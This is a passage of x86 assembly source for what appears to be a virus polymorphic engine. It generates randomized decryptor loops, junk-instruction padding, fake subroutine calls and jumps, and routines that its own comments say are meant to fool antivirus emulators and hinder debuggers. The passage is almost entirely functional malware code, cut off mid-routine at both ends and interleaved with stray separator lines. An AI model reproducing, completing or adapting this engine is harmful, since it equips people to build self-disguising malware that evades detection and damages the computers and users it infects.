||
call put_encloop_2
|
||
shr eax,10h
|
||
just_one_bk:
|
||
stosb
|
||
call put_encloop_1
|
||
exit_keychange:
|
||
ret
|
||
|
||
ch_mate: ; creates the decryption math operation
|
||
|
||
xor edx,edx
|
||
mov ecx,5h
|
||
type_sel:
|
||
cmp eax,ecx
|
||
jbe ok_regs
|
||
inc edx
|
||
sub eax,ecx
|
||
jmp type_sel ; get type and size.. in EDX size, in EAX type
|
||
; edx = 0 for byte, 1 for word, 2 for dword
|
||
|
||
ok_regs:
|
||
cmp byte ptr [esi - (offset t_chgpnt - offset r_regkey)],20h
|
||
lea esi,[offset _math_imm + ebp]
|
||
je without_key
|
||
add esi,(offset _math_key - offset _math_imm)
|
||
without_key:
|
||
dec eax ; type - 1
|
||
push esi
|
||
push eax
|
||
shl eax,1 ; each type is a word
|
||
add esi,eax
|
||
lodsw ; ax = mathop word
|
||
|
||
cmp dl,1
|
||
jne not_word
|
||
push eax
|
||
mov al,066h
|
||
stosb
|
||
call put_encloop_1
|
||
pop eax
|
||
not_word:
|
||
or dl,dl
|
||
jnz not_byte
|
||
dec al
|
||
not_byte:
|
||
pop ebx ; type - 1
|
||
pop esi ;
|
||
|
||
push ebx
|
||
|
||
push eax
|
||
neg ebx
|
||
add ebx,4 ; get opposite math operation
|
||
shl ebx,1
|
||
add esi,ebx
|
||
lodsw
|
||
|
||
lea esi,[offset r_regkey + ebp]
|
||
cmp byte ptr [esi],20h
|
||
je ok_regskey
|
||
cmp al,0d3h
|
||
je ok_regskey
|
||
add ah,08h ; since ECX is used as key
|
||
ok_regskey:
|
||
or dl,dl
|
||
jnz not_byterev
|
||
dec al
|
||
not_byterev:
|
||
add ah,03h ; in enc loop using EBX
|
||
call put_encloop_2
|
||
pop eax
|
||
|
||
mov cl,byte ptr [esi - (offset r_regkey - offset r_pointer)]
|
||
cmp cl,03h ; eax-ebx
|
||
ja upper_ones
|
||
add ah,cl
|
||
jmp ok_register_p
|
||
upper_ones:
|
||
add ah,06h
|
||
cmp cl,06h ; esi
|
||
je ok_register_p
|
||
inc ah
|
||
cmp cl,07h ; edi
|
||
je ok_register_p
|
||
add ah,03eh ; ebp
|
||
ok_register_p:
|
||
|
||
pop ecx ; type-1
|
||
|
||
cmp dword ptr [esi - (offset r_regkey - offset t_pntoff)],0
|
||
je not_plusoff
|
||
add ah,80h
|
||
not_plusoff:
|
||
stosw
|
||
|
||
xor eax,eax
|
||
|
||
cmp byte ptr [esi],20h ; using key?
|
||
je ok_register_k
|
||
|
||
or cl,cl
|
||
je check_rr
|
||
cmp cl,4
|
||
jne not_rol_ror
|
||
check_rr:
|
||
cmp byte ptr [esi],1 ; is key CX (cl)
|
||
je ok_register_k
|
||
mov al,10h ; if not put just immediate
|
||
sub byte ptr [edi-2],12h
|
||
|
||
mov ebx,dword ptr [esi - (offset r_regkey - offset w_encrypt)]
|
||
sub byte ptr [ebx-2],12h
|
||
|
||
push ecx
|
||
mov bl,20h
|
||
xchg bl,byte ptr [esi] ; won't use key reg anymore in the
|
||
call unset_used ; future, so use for garbage
|
||
pop ecx
|
||
jmp short ok_register_k
|
||
|
||
not_rol_ror:
|
||
mov al,byte ptr [esi]
|
||
shl eax,3 ; * 8
|
||
add byte ptr [edi-1],al ; key register
|
||
|
||
ok_register_k:
|
||
cmp byte ptr [esi - (offset r_regkey - offset r_pointer)],05h
|
||
jne not_usingbp
|
||
mov byte ptr [edi],00h
|
||
inc edi
|
||
not_usingbp:
|
||
|
||
mov eax,dword ptr [esi - (offset r_regkey - offset t_pntoff)]
|
||
or eax,eax
|
||
jz no_offsetadd
|
||
stosd
|
||
no_offsetadd:
|
||
cmp byte ptr [esi],20h
|
||
jne no_key_needed
|
||
|
||
push esi
|
||
add esi,dword ptr [esi - (offset r_regkey - offset layer_nr)]
|
||
mov eax,dword ptr [esi - (offset r_regkey - offset enc_space)]
|
||
pop esi
|
||
or cl,cl
|
||
je byte_key
|
||
cmp cl,4
|
||
je byte_key
|
||
or dl,dl
|
||
je byte_key
|
||
|
||
stosb
|
||
call put_encloop_1
|
||
|
||
shr eax,8
|
||
dec dl
|
||
jz byte_key
|
||
stosw
|
||
call put_encloop_2
|
||
shr eax,10h
|
||
byte_key:
|
||
stosb
|
||
call put_encloop_1
|
||
|
||
no_key_needed:
|
||
ret
|
||
|
||
rnd_garbage:
|
||
push ecx
|
||
push eax
|
||
call get_random
|
||
and eax,0fh ; max - 1
|
||
inc eax ; not zero
|
||
xchg eax,ecx
|
||
|
||
garbager:
|
||
; ecx how many
|
||
push edx
|
||
push ebx
|
||
garbager_loop:
|
||
push ecx
|
||
get_op_type:
|
||
call get_random ; how many possible types
|
||
and eax,garbage_mask
|
||
cmp eax,garbage_number
|
||
ja get_op_type
|
||
|
||
mov ecx,[(eax*4)+offset garbage_offsets+ebp]
|
||
add ecx,ebp
|
||
call ecx ; call garbage routine
|
||
pop ecx
|
||
loop garbager_loop
|
||
|
||
mov eax,dword ptr [t_pushed+ebp]
|
||
|
||
cmp eax,000005h ; if not in a call, not in a jump and
|
||
ja stack_is_ok ; pushed <=5
|
||
|
||
or eax,eax
|
||
jz stack_is_ok
|
||
|
||
inc byte ptr [t_inacall+ebp]
|
||
|
||
cmp al,01h
|
||
ja direct_addesp
|
||
call do_pop_nocheck
|
||
jmp stack_is_ok
|
||
|
||
direct_addesp:
|
||
push eax ; then correct stack
|
||
mov ax,0c483h ; add esp,nr_dd * 4
|
||
stosw
|
||
pop eax
|
||
call force_popall
|
||
stack_is_ok:
|
||
pop ebx
|
||
pop edx
|
||
|
||
pop eax
|
||
pop ecx
|
||
ret
|
||
|
||
do_push:
|
||
cmp byte ptr [t_pushed+ebp],05h ; max dwords on the stack
|
||
ja exit_pusher
|
||
inc byte ptr [t_pushed+ebp]
|
||
call get_random ; 4 types of pushing
|
||
and al,011b
|
||
jz push_register ; normal push reg
|
||
dec al
|
||
jz push_immediate_dd ; push immediate double
|
||
dec al
|
||
jz push_immediate_by ; push immediate byte
|
||
|
||
mov ax,35ffh ; push immediate from memory
|
||
stosw
|
||
call get_address
|
||
jmp pre_exit_dd
|
||
|
||
push_immediate_by:
|
||
mov al,6ah
|
||
stosb
|
||
shr ah,1
|
||
jc zero_or_menouno
|
||
bswap eax
|
||
jmp pre_exit_pusher
|
||
|
||
zero_or_menouno: ; very usual pushes
|
||
xchg ah,al
|
||
and al,01b ; so we will get 0 or -1
|
||
dec al ; to LARGE 0 or to LARGE -1
|
||
jmp pre_exit_pusher
|
||
|
||
push_immediate_dd:
|
||
mov al,68h
|
||
stosb
|
||
call get_random
|
||
pre_exit_dd:
|
||
stosd ; normal push as double
|
||
jmp exit_pusher
|
||
|
||
push_register:
|
||
call get_random_al7
|
||
add al,050h
|
||
pre_exit_pusher:
|
||
stosb
|
||
exit_pusher:
|
||
jmp exit_ppc
|
||
|
||
do_pop:
|
||
cmp byte ptr [t_pushed+ebp],00h
|
||
je return_nopop
|
||
do_pop_nocheck:
|
||
call get_random
|
||
shr al,1
|
||
jnc popintoreg2
|
||
mov ax,0c483h ; add esp,
|
||
stosw
|
||
get_number:
|
||
call get_random_al7
|
||
jz get_number
|
||
cmp al,byte ptr [t_pushed+ebp]
|
||
ja get_number
|
||
force_popall:
|
||
sub byte ptr [t_pushed+ebp],al
|
||
shl al,2 ; dd are pushed, so * 4
|
||
jmp store_ngo2
|
||
popintoreg2:
|
||
call get_register
|
||
add cl,058h ; pop in a register
|
||
xchg eax,ecx
|
||
dec byte ptr [t_pushed+ebp]
|
||
store_ngo2:
|
||
stosb
|
||
return_nopop:
|
||
jmp exit_ppc
|
||
|
||
call_subroutines:
|
||
cmp word ptr [t_maxjmps+ebp],0h ; don't nest too much nor
|
||
jne just_exit_call ; put pushes/pops in subs and
|
||
; we can't know wassup in
|
||
; conditional jumps and such
|
||
|
||
inc byte ptr [t_inacall+ebp]
|
||
|
||
call get_random_al7
|
||
cmp al,01h ; 00h and 01h push
|
||
jbe do_push
|
||
cmp al,05 ; 02h - 05h pops (more probable so final stack
|
||
jbe do_pop ; correction should be needed less often)
|
||
|
||
; 06,07 do a call
|
||
mov al,0e8h
|
||
stosb
|
||
stosd ; place for offset
|
||
|
||
push edi
|
||
call rnd_garbage
|
||
pop ebx
|
||
|
||
mov al,0e9h
|
||
stosb
|
||
stosd ; jump offset
|
||
push edi
|
||
call krappo_gen ; random bytes
|
||
call rnd_garbage
|
||
|
||
push ebx
|
||
neg ebx
|
||
add ebx,edi
|
||
xchg eax,ebx
|
||
pop ebx
|
||
|
||
mov dword ptr [ebx-4],eax ; call offset
|
||
|
||
call rnd_garbage ; this is the called "subroutine"
|
||
|
||
call get_random ; more ways of getting back from subroutine,
|
||
shr al,1 ; either with normal ret or by correcting the
|
||
jnc normal_ret ; stack by popping or by adding to esp
|
||
shr al,1
|
||
jnc popintoreg
|
||
mov ax,0c483h ; add esp,
|
||
stosw
|
||
mov al,4
|
||
jmp store_ngo
|
||
popintoreg:
|
||
call get_register
|
||
add cl,058h ; pop base
|
||
xchg eax,ecx
|
||
jmp store_ngo
|
||
normal_ret:
|
||
mov al,0c3h ; ret
|
||
stosb
|
||
bswap eax ; some random
|
||
and eax,07h
|
||
cmp al,4
|
||
jb do_the_int3s
|
||
jne no_ccs
|
||
random_crap:
|
||
call krappo_gen
|
||
jmp no_ccs
|
||
do_the_int3s:
|
||
xchg eax,ecx
|
||
mov al,0cch ; int3, usual after subroutines in win32s
|
||
rep stosb
|
||
store_ngo:
|
||
stosb
|
||
no_ccs:
|
||
call rnd_garbage
|
||
|
||
pop ebx ; jump offset
|
||
|
||
push ebx
|
||
neg ebx
|
||
add ebx,edi
|
||
xchg eax,ebx
|
||
pop ebx
|
||
|
||
mov dword ptr [ebx-4],eax
|
||
exit_ppc:
|
||
dec byte ptr [t_inacall+ebp]
|
||
just_exit_call:
|
||
ret
|
||
|
||
maths_immediate_short:
|
||
stc
|
||
jmp maths_immediate_1
|
||
|
||
maths_immediate:
|
||
clc
|
||
maths_immediate_1:
|
||
pushf
|
||
call get_random ; (0 to 7) * 8
|
||
and al,0111000b
|
||
add al,0c0h ; the base
|
||
popf
|
||
push eax
|
||
pushf
|
||
call get_register
|
||
add al,cl
|
||
mov ah,81h ; prefix
|
||
popf
|
||
pushf
|
||
jnc not_a_shortone
|
||
inc ah
|
||
inc ah
|
||
not_a_shortone:
|
||
xchg ah,al
|
||
stosw
|
||
call g_dimension
|
||
popf
|
||
jnc not_a_shortone2
|
||
mov cl,01h
|
||
not_a_shortone2:
|
||
call put_immediates
|
||
pop eax
|
||
cmp al,0f8h ; is a CMP
|
||
jne not_compare
|
||
make_jmp_after_cmp:
|
||
call get_random
|
||
and eax,01b ; long or short jump
|
||
add al,06h ; short jump
|
||
jmp make_jump
|
||
not_compare:
|
||
ret
|
||
|
||
cdq_jmps_savestack:
|
||
call get_random_al7
|
||
sub al,3
|
||
jc exit_c_j_ss
|
||
xchg eax,ecx
|
||
mov al,byte ptr [ecx+offset change_jump+ebp]
|
||
cmp cl,1
|
||
ja not_cdq_cbw
|
||
|
||
test byte ptr [r_used+ebp],0101b ; EAX and EDX for cbw,cwd,cdq,cwde
|
||
jnz exit_c_j_ss
|
||
stosb
|
||
inc edi
|
||
call g_dimension
|
||
dec edi
|
||
jmp exit_c_j_ss
|
||
not_cdq_cbw:
|
||
cmp cl,4
|
||
je pushandmov
|
||
add cl,4 ; this is used for dimension
|
||
jmp do_that_fjump ; do as for conditional ones
|
||
pushandmov:
|
||
|
||
call select_save
|
||
jc exit_c_j_ss
|
||
|
||
xchg eax,ebx
|
||
mov al,50h ; push
|
||
|
||
xor ch,ch ; so it won't be erased from stack
|
||
xchg ch,byte ptr [t_pushed+ebp]
|
||
|
||
push ecx
|
||
call unset_used ; mark that as unused one
|
||
add al,bl ; push the reg
|
||
stosb
|
||
call rnd_garbage
|
||
add al,08h ; pop opcode
|
||
stosb
|
||
|
||
pop ebx
|
||
mov byte ptr [t_pushed+ebp],bh
|
||
mov byte ptr [r_used+ebp],bl
|
||
exit_c_j_ss:
|
||
ret
|
||
|
||
|
||
gen_one_byters:
|
||
call get_random_al7
|
||
make_jump:
|
||
mov cl,al
|
||
mov al,byte ptr [eax+offset one_byters+ebp] ; get onebyter
|
||
cmp cl,05h
|
||
jbe not_jump
|
||
do_that_fjump:
|
||
cmp byte ptr [t_maxjmps+ebp],3 ; don't nest too much
|
||
je just_exit
|
||
inc byte ptr [t_maxjmps+ebp]
|
||
|
||
cmp al,0e9h ; for unconditional ones skip some
|
||
jae skip_unc ; things
|
||
|
||
cmp cl,07h
|
||
jne not_longjump
|
||
push eax
|
||
mov al,0fh ; long prefix
|
||
stosb
|
||
pop eax
|
||
not_longjump:
|
||
push eax
|
||
call get_random
|
||
and al,0fh
|
||
mov ch,al
|
||
pop eax
|
||
add al,ch
|
||
skip_unc:
|
||
stosb ; type of jump
|
||
stosb ; first off
|
||
cmp cl,07h
|
||
jne not_longone
|
||
dec edi
|
||
stosd
|
||
not_longone:
|
||
push edi
|
||
call rnd_garbage
|
||
pop ebx
|
||
mov eax,edi
|
||
sub eax,ebx ; offset of jump
|
||
dec byte ptr [t_maxjmps+ebp]
|
||
cmp cl,7
|
||
je long_jumper
|
||
cmp eax,7fh ; if not too big then use it
|
||
jb good_jump
|
||
mov edi,ebx ; else forget everything
|
||
dec edi
|
||
dec edi
|
||
ret
|
||
good_jump:
|
||
mov byte ptr [ebx-1],al
|
||
ret
|
||
long_jumper:
|
||
mov dword ptr [ebx-4],eax
|
||
ret
|
||
not_jump:
|
||
stosb
|
||
just_exit:
|
||
ret
|
||
|
||
mem_assign:
|
||
mov ax,058bh
|
||
jmp mem_common
|
||
|
||
mem_mathops:
|
||
call get_random
|
||
and al,111000b ; (0 to 7) * 8
|
||
add al,03h ; base
|
||
mem_common:
|
||
push eax
|
||
call get_register
|
||
shl cl,3 ; *8
|
||
add cl,05h ; base for eax
|
||
mov ah,cl
|
||
stosw
|
||
call g_dimension
|
||
|
||
; now offset
|
||
call get_address
|
||
stosd
|
||
pop eax
|
||
cmp al,3bh ; is a cmp
|
||
je make_jmp_after_cmp ; if so force a compare
|
||
ret
|
||
|
||
diff_movz: ; movsx,movzx,bt,btc,btr,bts,bswap
|
||
call get_random ; 1 bit dim, 2 bit m/b
|
||
mov cl,al
|
||
mov dh,ah
|
||
test cl,1100000b
|
||
jnz no_wpf
|
||
mov al,066h
|
||
stosb
|
||
no_wpf:
|
||
mov al,0fh
|
||
stosb
|
||
mov al,0b6h
|
||
shr cl,1
|
||
jc some_bt
|
||
shr cl,1
|
||
jc zero_extend
|
||
add al,08h
|
||
zero_extend:
|
||
shr cl,1
|
||
jc dest_dw ; generate movsx/movzx on d or w
|
||
inc al
|
||
dest_dw:
|
||
stosb
|
||
call get_random_al7
|
||
mov dl,al
|
||
add al,0c0h
|
||
call get_register
|
||
shl cl,3
|
||
add al,cl
|
||
and dh,011b
|
||
pushf
|
||
jnz just_regs
|
||
sub al,0c0h-05h
|
||
sub al,dl
|
||
just_regs:
|
||
stosb
|
||
popf
|
||
jnz justret_r
|
||
call get_address
|
||
stosd
|
||
justret_r:
|
||
ret
|
||
|
||
some_bt:
|
||
shr cl,1
|
||
jc do_bswap
|
||
add al,04h ; btX second byte
|
||
stosb
|
||
and cl,011000b
|
||
add cl,0e0h
|
||
mov al,cl
|
||
call get_register
|
||
add al,cl
|
||
stosb
|
||
shr dh,1
|
||
pushf ; make jmp after or not
|
||
and dh,01fh ; not much sense doing > 32
|
||
mov al,dh
|
||
stosb
|
||
popf
|
||
jc make_jmp_after_cmp
|
||
ret
|
||
|
||
do_bswap:
|
||
call get_register
|
||
mov al,0c8h ; bswap
|
||
add al,cl
|
||
stosb
|
||
ret
|
||
|
||
mov_registers:
|
||
call get_random_al7 ; random source
|
||
add al,0c0h
|
||
mov ah,08bh
|
||
call get_register ; useful dest
|
||
shl cl,3
|
||
add al,cl
|
||
xchg ah,al
|
||
stosw
|
||
jmp g_dimension
|
||
|
||
maths_registers:
|
||
call get_random
|
||
and al,0111000b
|
||
add al,03h ; base
|
||
mov ah,0c0h ; suff
|
||
push eax
|
||
|
||
call get_register ; dest
|
||
shl cl,03h
|
||
add ah,cl
|
||
|
||
xchg eax,ecx ; save temp in ecx
|
||
call get_random_al7 ; all regs
|
||
xchg eax,ecx ; reg in ECX and restore EAX
|
||
|
||
add ah,cl
|
||
stosw
|
||
|
||
call g_dimension
|
||
pop eax
|
||
cmp al,3bh
|
||
je make_jmp_after_cmp
|
||
ret
|
||
|
||
rotating_imms:
|
||
call get_random_al7
|
||
cmp al,0110b ; 0f0 doesn't exist
|
||
je rotating_imms
|
||
shl al,3 ; *8
|
||
add al,0c0h
|
||
|
||
call get_register
|
||
add al,cl
|
||
mov ah,0c1h
|
||
xchg al,ah
|
||
stosw
|
||
call g_dimension
|
||
xor ecx,ecx
|
||
inc cl
|
||
jmp put_immediates
|
||
|
||
notneg_register:
|
||
call get_random
|
||
shr al,1
|
||
mov ax,0d0f7h
|
||
jc not_add
|
||
add ah,08h
|
||
not_add:
|
||
call get_register
|
||
add ah,cl
|
||
stosw
|
||
; jmp g_dimension
|
||
|
||
g_dimension:
|
||
; EDI after generated garb
|
||
reget_dim:
|
||
call get_random_al7
|
||
cmp al,2
|
||
jae no_change
|
||
word_change:
|
||
mov ecx,dword ptr [edi-2]
|
||
mov byte ptr [edi-2],66h ; the prefix
|
||
mov dword ptr [edi-1],ecx
|
||
inc edi
|
||
mov al,2
|
||
jmp post_no_change
|
||
no_change:
|
||
mov al,4
|
||
post_no_change:
|
||
xchg eax,ecx ; in ECX needed immediates
|
||
ret
|
||
|
||
imm_assign:
|
||
call get_register
|
||
mov al,0b8h ; base
|
||
add al,cl
|
||
stosb
|
||
inc edi
|
||
call g_dimension
|
||
dec edi
|
||
; jmp put_immediates
|
||
|
||
put_immediates:
|
||
; cl how many
|
||
call get_random
|
||
put_imm_part:
|
||
stosb
|
||
shr eax,8
|
||
loop put_imm_part
|
||
ret
|
||
|
||
inc_dec_reg:
|
||
call get_random
|
||
and al,01000b ; 0 or 8
|
||
add al,40h ; incdec generation
|
||
call get_register
|
||
add al,cl
|
||
stosb
|
||
inc edi
|
||
call g_dimension
|
||
dec edi
|
||
ret
|
||
|
||
xchg_regs:
|
||
mov al,087h ; xchg eax,eax
|
||
call get_register
|
||
mov ah,cl
|
||
call get_register
|
||
common_test_xchg:
|
||
shl cl,3
|
||
add ah,cl
|
||
add ah,0c0h
|
||
stosw
|
||
jmp g_dimension
|
||
|
||
test_regs:
|
||
call get_random
|
||
xchg eax,ecx
|
||
and cx,0707h
|
||
mov ah,ch
|
||
mov al,085h ; test eax,eax
|
||
jmp common_test_xchg
|
||
|
||
temp_save_change:
|
||
call get_random_al7
|
||
sub al,6 ; 1/4 probability, since this couldn't
|
||
jc skip_changer ; come too often
|
||
|
||
call select_save
|
||
jc skip_changer
|
||
|
||
push ecx
|
||
call save_mov_xchg
|
||
|
||
xchg eax,ecx ; in al new register
|
||
mov al,byte ptr [edx] ; imp_reg
|
||
shl al,3
|
||
xchg eax,ecx
|
||
add al,cl
|
||
or al,0c0h
|
||
xchg al,ah
|
||
stosw ; mov important_reg,some_reg
|
||
pop ebx
|
||
mov byte ptr [r_used+ebp],bl ; restore regs status
|
||
skip_changer:
|
||
ret
|
||
|
||
select_save:
|
||
call get_random_al7
|
||
sub al,5 ; get from 0 to 2
|
||
jc select_save
|
||
|
||
xchg eax,edx
|
||
add edx,offset r_pointer
|
||
add edx,ebp
|
||
mov al,byte ptr [edx]
|
||
|
||
cmp al,0ffh ; not already assigned?
|
||
je exit_bad
|
||
|
||
cmp al,20h ; no key signature, if so skip
|
||
je exit_bad
|
||
|
||
call is_used ; maybe is already saved on stack or
|
||
jnz return_good ; such?
|
||
exit_bad:
|
||
stc
|
||
ret
|
||
return_good:
|
||
mov cl,byte ptr [r_used+ebp]
|
||
clc
|
||
ret
|
||
|
||
save_mov_xchg:
|
||
xchg eax,ebx
|
||
call get_register ; get an usable register
|
||
xchg eax,ecx
|
||
call set_used ; set this one as used
|
||
call unset_used ; and the previous as unused
|
||
mov ah,087h ; xchg reg,reg base
|
||
push eax
|
||
xor ecx,ecx
|
||
call get_random ; select if using mov or xchg
|
||
shr al,1
|
||
jc use_mov_first
|
||
mov cl,4 ; + 4 becames mov reg,reg base
|
||
use_mov_first:
|
||
shr al,1 ; when just saving this won't be used
|
||
jc use_mov_after ; select whichone for restore aswell
|
||
mov ch,4
|
||
use_mov_after:
|
||
pop eax
|
||
add ah,ch ; restore one
|
||
push eax
|
||
sub ah,ch
|
||
add ah,cl
|
||
shl al,3 ; * 8
|
||
add al,bl
|
||
or al,0c0h ; mov some_reg,important_reg
|
||
xchg al,ah
|
||
stosw ; put the moving of regs
|
||
call rnd_garbage
|
||
pop eax
|
||
ret
|
||
|
||
sets_misc:
|
||
call get_random ; type of sel
|
||
mov al,0fh
|
||
and ah,al
|
||
add ah,090h
|
||
call get_register
|
||
cmp cl,3
|
||
ja cant_useset ; won't retry, so not too many
|
||
stosw
|
||
bswap eax ; rnd
|
||
shr al,1
|
||
jc docs_ones
|
||
add cl,08h ; has 2 set of ocodes
|
||
docs_ones:
|
||
shr al,1
|
||
jc low_ones
|
||
add cl,04h ; high or low 8
|
||
low_ones:
|
||
mov al,0c0h
|
||
add al,cl
|
||
stosb
|
||
ret
|
||
|
||
cant_useset: ; shld/shrd
|
||
test ah,110b ; last bit used later
|
||
jnz no_66p
|
||
push eax
|
||
mov al,066h ; with words
|
||
stosb
|
||
pop eax
|
||
no_66p:
|
||
shr ah,1
|
||
mov ah,0a4h
|
||
jc do_shlld
|
||
add ah,0ch-04h ; shrd
|
||
do_shlld:
|
||
cmp cl,7
|
||
jne noss_with_cl
|
||
inc ah ; with immediate cl
|
||
noss_with_cl:
|
||
stosw
|
||
call get_random
|
||
and al,0111000b
|
||
call get_register
|
||
add al,cl
|
||
add al,0c0h ; in ah we have rnd sh nr
|
||
stosb
|
||
test byte ptr [edi-2],01b ;was using cl?
|
||
jnz wasnt_with_cl
|
||
dec edi
|
||
stosw
|
||
wasnt_with_cl:
|
||
ret
|
||
|
||
xadd_cmpxchg:
|
||
call get_random
|
||
and ah,10h ; 10h or 00h
|
||
jc np_nchk
|
||
test byte ptr [ebp+r_used],01b ; is ax used?
|
||
jnz home_xx ; if so no cmpxchg
|
||
np_nchk:
|
||
test al,110b
|
||
jnz no_66pr
|
||
mov al,66h
|
||
stosb
|
||
no_66pr:
|
||
add ah,0b1h
|
||
cmp byte ptr [edi-1],066h
|
||
je cant_byterize
|
||
and al,1
|
||
sub ah,al ; cmpxchg or xadd with b or notb
|
||
cant_byterize:
|
||
mov al,0fh
|
||
stosw
|
||
get_reg1:
|
||
call get_register
|
||
mov ch,cl
|
||
get_reg2:
|
||
call get_register
|
||
mov al,0c0h
|
||
test byte ptr [edi-1],01b ; was using bytes?
|
||
jnz no_byteprob
|
||
cmp ch,3 ; if bytes must be <= 3
|
||
ja get_reg1
|
||
cmp cl,3
|
||
ja get_reg2
|
||
push eax
|
||
bswap eax ; high part of rnd
|
||
and ax,010000000100b ; random +4 on both src and dest
|
||
add cx,ax
|
||
pop eax
|
||
no_byteprob:
|
||
shl cl,3
|
||
add al,cl
|
||
add al,ch
|
||
stosb
|
||
home_xx:
|
||
ret
|
||
|
||
emu_stuffy: ; some stuff to try to fool emus
|
||
call get_random
|
||
and al,011111b ; not too often
|
||
jnz keep_few_ae
|
||
|
||
lea edx,[ebp + offset t_pushed]
|
||
|
||
shr ah,1
|
||
jc regs_checking
|
||
|
||
shr ah,1
|
||
jc xlat_generation
|
||
|
||
stack_checking:
|
||
; check if stack seems consistent or not
|
||
mov al,68h ; push immediate opcode
|
||
stosb
|
||
call get_random
|
||
stosd
|
||
push eax
|
||
xor ch,ch ; nr of dword on stack
|
||
xchg ch,byte ptr [edx] ; don't smash our stack
|
||
call rnd_garbage
|
||
call get_register
|
||
mov al,cl
|
||
call set_used
|
||
mov bl,al
|
||
add al,058h ; pop opcode
|
||
stosb
|
||
mov byte ptr [edx],ch ; can work on stack again
|
||
call rnd_garbage
|
||
call unset_used
|
||
|
||
typepopchk:
|
||
call get_random
|
||
shr al,1
|
||
jnc check_posones
|
||
and ah,100000b ; add/and reg32, not/neg imm
|
||
jnz just_not_atesp
|
||
dec dword ptr [esp] ; since add needs the neg value
|
||
just_not_atesp:
|
||
not dword ptr [esp] ; the imm
|
||
add ah,0c0h
|
||
jmp chksta_st
|
||
check_posones:
|
||
and ah,011000b
|
||
jz typepopchk
|
||
add ah,0e0h
|
||
chksta_st:
|
||
mov al,81h ; cmp/sub/xor reg32,imm
|
||
add ah,bl
|
||
stosw
|
||
pop eax ; value to check with
|
||
stosd
|
||
check_okequ:
|
||
mov bx,07574h
|
||
jmp do_jumpzh
|
||
|
||
|
||
regs_checking:
|
||
shr ah,1
|
||
jc ss_play
|
||
|
||
shr ah,1
|
||
jc mem_write
|
||
|
||
; ones just checking our regs (pointer and counter) consistency
|
||
; compare with zero in various ways and jump at the right code if !=
|
||
cmp dword ptr [edx - (offset t_pushed - offset w_loopbg)],00h
|
||
; not in the loop
|
||
jne keep_few_ae
|
||
|
||
bswap eax
|
||
and eax,01b ; 0 or 1
|
||
add eax,ebp
|
||
add eax,offset r_pointer ; so will be r_pointer or r_counter
|
||
mov al,byte ptr [eax]
|
||
inc al ; already initialized ?
|
||
jz keep_few_ae
|
||
dec al
|
||
call is_used ; check that we aren't in moving thingy
|
||
jz keep_few_ae
|
||
reran_h:
|
||
call get_random_al7 ; type of cmp
|
||
cmp al,5
|
||
jae or_oring ; do or reg,reg
|
||
|
||
lea ebx,[edx - (offset t_pushed - offset chk_counter)]
|
||
add ebx,eax ; which one
|
||
mov ah,byte ptr [ebx]
|
||
mov al,83h
|
||
add ah,cl
|
||
stosw
|
||
xor al,al
|
||
stosb ; with a zero
|
||
jmp do_jumpzh_reg
|
||
|
||
or_oring:
|
||
mov ax,0c00bh ; or eax,eax base
|
||
add ah,cl ; have in cl the reg
|
||
shl cl,3
|
||
add ah,cl ; both src and dest
|
||
stosw
|
||
do_jumpzh_reg:
|
||
mov bx,07475h
|
||
; JZ and JNZ creation (considering BH is okay, while BL makes shit)
|
||
do_jumpzh:
|
||
call get_random
|
||
shr al,1 ; do jz or jnz ?
|
||
jnc do_jz_easily
|
||
; else we have to do a construction with
|
||
; more sense
|
||
mov al,bl
|
||
stosw
|
||
too_long_redo:
|
||
push dword ptr [edx] ; save stack situation
|
||
mov ebx,edi ; jmp offset +1
|
||
call rnd_garbage
|
||
call get_random ; random byte to break execution or ret
|
||
shr ah,1
|
||
jc no_jmpback ; do a long jmp back to hide the loop one
|
||
mov al,0e9h
|
||
stosb
|
||
or ax,0ffffh ; not too long
|
||
bswap eax
|
||
or ah,0f8h
|
||
stosd
|
||
jmp comehome
|
||
no_jmpback:
|
||
shr ah,1
|
||
jnc rndbyteuse
|
||
mov al,0c3h ; a ret is quite polite for the emu :)
|
||
rndbyteuse:
|
||
stosb
|
||
comehome:
|
||
call rnd_garbage
|
||
pop dword ptr [edx]
|
||
mov eax,edi
|
||
sub eax,ebx
|
||
cmp eax,07fh ; see it is not too long for a short jmp
|
||
jbe oki_lenght
|
||
mov edi,ebx ; else retry
|
||
jmp too_long_redo
|
||
oki_lenght:
|
||
mov byte ptr [ebx-1],al
|
||
jmp keep_few_ae
|
||
do_jz_easily:
|
||
mov al,bh ; jz short to some random location
|
||
stosw
|
||
keep_few_ae:
|
||
ret
|
||
|
||
xlat_generation: ; is xlat emulated? anyway, hc garbage :)
|
||
shr ah,1
|
||
jnc enter_generation
|
||
|
||
test byte ptr [edx - (offset t_pushed - offset r_used)],01001b
|
||
jnz keep_few_ae ; are ebx and eax unused ?
|
||
mov al,0bbh ; mov ebx
|
||
stosb
|
||
push edx
|
||
call get_address ; a decent mem addy
|
||
stosd
|
||
pop edx ; set ebx as used
|
||
or byte ptr [edx - (offset t_pushed - offset r_used)],01000b
|
||
call rnd_garbage ; and then unset ebx as used
|
||
and byte ptr [edx - (offset t_pushed - offset r_used)],(NOT 1000b)
|
||
mov al,0d7h ; xlat opcode
|
||
stosb
|
||
ret
|
||
|
||
enter_generation: ; some more funny garbage
|
||
mov al,0c8h ; enter
|
||
stosb
|
||
bswap eax
|
||
and al,0111100b ; requested stack
|
||
stosb
|
||
xor al,al
|
||
stosb
|
||
stosb
|
||
xchg al,byte ptr [edx] ; don't smash our stack
|
||
mov ah,byte ptr [edx - (offset t_pushed - offset r_used)] ; no ebp
|
||
or byte ptr [edx - (offset t_pushed - offset r_used)],100000b
|
||
call rnd_garbage
|
||
mov byte ptr [edx],al
|
||
mov byte ptr [edx - (offset t_pushed - offset r_used)],ah
|
||
mov al,0c9h ; leave
|
||
stosb
|
||
ret
|
||
|
||
ss_play:
|
||
; opcodes that modify SS (actually they don't change it, but will
|
||
; make life harder for debuggers and some emus hopefully)
|
||
shr ah,1
|
||
jc with_regs_ssplay
|
||
; first way, just push ss and then pop ss later
|
||
mov al,016h ; push
|
||
stosb
|
||
xor ah,ah
|
||
xchg ah,byte ptr [edx] ; don't smash our stack
|
||
call rnd_garbage
|
||
xchg ah,byte ptr [edx]
|
||
inc al ; pop
|
||
stosb
|
||
ret
|
||
with_regs_ssplay:
|
||
; mov reg,ss and later mov ss,reg
|
||
and ah,011b
|
||
jnz no_66pfss
|
||
mov al,066h ; is oky anyway
|
||
stosb
|
||
no_66pfss:
|
||
call get_register
|
||
mov ax,0d08ch ; mov reg,ss
|
||
add ah,cl
|
||
stosw
|
||
xchg eax,ecx
|
||
call set_used ; don't mess with that one
|
||
call rnd_garbage
|
||
